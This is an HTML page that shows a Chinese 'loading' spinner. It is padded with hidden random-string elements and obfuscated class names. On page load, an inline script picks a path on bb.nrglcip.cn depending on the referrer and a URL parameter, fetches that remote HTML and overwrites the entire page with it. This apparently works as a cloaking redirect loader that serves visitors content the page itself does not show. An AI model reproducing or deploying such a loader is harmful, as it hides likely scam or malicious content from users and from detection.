<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .oM85QEq42 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .oM85QEq42 .Lo8Iki {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .oM85QEq42 .content {
            line-height: 50px;
            text-align: center
        }

        .oM85QEq42 .img {
            width: 100%
        }

        .oM85QEq42 .yfyXbc {
            text-align: center
        }

        .oM85QEq42 .yfyXbc span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .oM85QEq42 .yfyXbc span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .oM85QEq42 .yfyXbc span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .oM85QEq42 .yfyXbc span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .oM85QEq42 .yfyXbc span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .oM85QEq42 .yfyXbc span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .oM85QEq42 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function U6wHvtRgDS0(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var hue5y = U6wHvtRgDS0('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ hue5y +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ hue5y +".html?a=share";
		}
		
        QYvfb6Xt=url+"#"+new Date().getTime();
        QYvfb6Xt && function() {
            $.get(QYvfb6Xt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >LuNmBVYgIvG2MMRWXhT4vJ9eOGa</li>
<ul style='display:none' >vSMj9723wwqD3PoSArLIOKsC2WZBVBr6vwUZqobHDgK1k1mw4Cy9gZtZFFPQ6fldD0TjxFrHnvs6Il4l7jsiBuv7ZXpzFw</ul>
<div style='display:none'>whdyqxUASvWVviuZqVsXeyDoMUfbJXBecf9No</div>
<b style='display:none' >uTyt1QjXFxXAK1xHyEpiPB</b>
<img  src='' style='display:none'>
<ul style='display:none' >vSMj9723wwqD3PoSArLIOKsC2WZBVBr6vwUZqobHDgK1k1mw4Cy9gZtZFFPQ6fldD0TjxFrHnvs6Il4l7jsiBuv7ZXpzFw</ul>
<ul style='display:none' >vSMj9723wwqD3PoSArLIOKsC2WZBVBr6vwUZqobHDgK1k1mw4Cy9gZtZFFPQ6fldD0TjxFrHnvs6Il4l7jsiBuv7ZXpzFw</ul><div class="oM85QEq42">
    <div class="Lo8Iki">
        <div class="yfyXbc">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>ai9WWgA0Jf3ucc</span>
<img  src='' style='display:none'>
<div style='display:none'>xROW1q3pt2rkL9WFszUxIMTiukUBQqSy32LM3Eq6hy64Ix1kDNk37WIuVv0rLgjUdqpZJPML0oA3LH8Y91NPfWdehzVp5u</div>
<span style='display:none'>ai9WWgA0Jf3ucc</span></body>
</html>